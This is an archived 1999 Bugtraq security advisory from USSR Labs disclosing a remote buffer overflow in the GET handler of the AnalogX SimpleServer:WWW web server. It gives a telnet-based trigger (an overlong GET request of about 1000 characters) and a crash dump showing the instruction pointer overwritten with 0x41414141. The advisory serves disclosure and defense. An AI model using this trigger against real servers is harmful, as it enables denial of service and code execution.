4627859 1999-12-31 19:20 /126 rader/ Postmaster Mottagare: Bugtraq (import) <9110> Ärende: Local / Remote GET Buffer Overflow Vulnerability in Analog ------------------------------------------------------------ SimpleServer:WWW HTTP Server v1.1 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Message-ID: <NCBBKFKDOLAGKIAPMILPAEPECBAA.labs@ussrback.com> Date: Fri, 31 Dec 1999 05:22:38 -0300 Reply-To: Ussr Labs <labs@USSRBACK.COM> Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM> From: Ussr Labs <labs@USSRBACK.COM> X-To: BUGTRAQ <bugtraq@securityfocus.com> To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Happy New Year! to All!! Local / Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW HTTP Server v1.1 USSR Advisory Code: USSR-99029 Release Date: December 31, 1999 [5/5] (not the original one), original [5/5] will be released 15/01/1900 :) Systems Affected: AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly others versions. About The Software: Introducing AnalogX SimpleServer:WWW, the first in a series of simple to use yet powerful servers! This webserver is SO easy to use, about the only thing you need to know how to do is drag and drop files; then just click on the 'Start' button, and you're webserver is up and running, serving your pages to the world! SimpleServer:WWW supports MIME file typing, CGI, common log format, and multi-hosting, just to name a few! If you've always wanted a compact, easy to use, versatile webserver, then you're prayers have been answered. THE PROBLEM UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed. Do you do the w00w00? This advisory also acts as part of w00giving. This is another contribution to w00giving for all you w00nderful people out there. You do know what w00giving is don't you? http://www.w00w00.org/advisories.html Example [hell@imahacker]$ telnet die.communitech.net 80 Trying example.com... Connected to die.communitech.net Escape character is '^]'. GET (buffer) HTTP/1.1 <enter><enter> Where [buffer] is aprox. 1000 characters. At his point the server overflows. And in remote machine someone will be see something like this. HTTP caused an invalid page fault in module <unknown> at 0000:41414141. Registers: EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246 EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080 ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47 EDX=bff76855 ES=0187 EDI=00af012c GS=0000 Bytes at CS:EIP: Stack dump: bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855 00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104 41414141 00af02f0 Binary or source for this Exploit (wen we finish it): http://www.ussrback.com/ Vendor Status: Informed. Vendor Url: http://www.analogx.com/ Program Url: http://www.analogx.com/contents/download/network/sswww.htm Credit: USSRLABS SOLUTION Noting yet. Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock Tellier, Technotronic and Wiretrip. u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com> iQA/AwUBOGxnytybEYfHhkiVEQJK5wCgmaLVBV+HgxkGsohLqg4KACZ7GjoAn1Ia 80kx+RvCDy/TwvA/8/krjvME =H+Dr -----END PGP SIGNATURE----- (4627859) ------------------------------------------